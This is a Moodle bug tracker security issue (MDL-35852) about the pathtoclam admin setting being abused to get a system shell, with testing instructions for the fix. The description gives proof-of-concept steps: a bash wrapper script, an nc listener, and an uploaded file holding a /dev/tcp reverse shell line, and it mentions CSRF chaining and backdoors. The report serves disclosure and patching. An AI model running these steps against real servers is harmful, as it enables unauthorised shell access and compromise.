Uploaded image for project: 'Moodle'
  1. Moodle
  2. MDL-35852

PRIVESC: admin setting pathtoclam can be abused to gain a system shell

    Details

    • Testing Instructions:
      Hide
      1. set this in config.php: $CFG->preventexecpath = true;
      2. visit admin settings that use execpath (admin > server > system paths)
      3. check to make sure a warning is displayed to say the values are disabled in config.php
      4. try to edit/change the settings/save and then check to see if the settings were changed.
      5. NOTE: as per hardcoding of other $CFG vars it doesn't lock the field - it just prevents saving over the top of the hardcoded values.
      Show
      set this in config.php: $CFG->preventexecpath = true; visit admin settings that use execpath (admin > server > system paths) check to make sure a warning is displayed to say the values are disabled in config.php try to edit/change the settings/save and then check to see if the settings were changed. NOTE: as per hardcoding of other $CFG vars it doesn't lock the field - it just prevents saving over the top of the hardcoded values.
    • Affected Branches:
      MOODLE_23_STABLE
    • Fixed Branches:
      MOODLE_25_STABLE
    • Pull Master Branch:
      master_MDL-35852

      Description

      If a malicious admin has access to the server, and can create an executeable file then they could abuse the pathtoclam setting to gain shell access as the user running the web server.
      On earlier versions, it may use the upload_manager class instead of the repositories api to scan the file so this existing access may not be needed

      Steps:

      • Web Admin to create a file /home/admin/bash with following contents
        #!/bin/bash
        shift;/bin/bash $*
        (the shift is to get rid of the --stdout argument passed in on repository/lib.php line 1082)
      • Web Admin to start a listener using nc or equivalent
        nc -l 127.0.0.1 -p 4444
      • Set pathtoclam to /home/admin/bash, and set runclamonupload to true
      • Upload a file with contents such as
        #!/bin/bash
        /bin/bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
      • In the nc session, the user now has a shell session started by web server

      This could potentially be done by any user if there are CSRF vulnerable parts of Moodle
      that could use that attack to set the pathtoclam on behalf of the admin, the actual
      uploading of a file to get the shell can be done by any user.

      Once a shell is established, a backdoor could be setup.

      If in earlier versions, the clam scan doesn't run in repository/lib.php but instead in
      lib/uploadlib.php, then the existing access is not needed, and you could use instead a
      pathtoclam of /bin/bash, as there is no --stdout argument.

      Cheers,

      Hugh

        Gliffy Diagrams

          Attachments

            Issue Links

              Activity

                People

                • Votes:
                  1 Vote for this issue
                  Watchers:
                  7 Start watching this issue

                  Dates

                  • Created:
                    Updated:
                    Resolved:
                    Fix Release Date:
                    14/May/13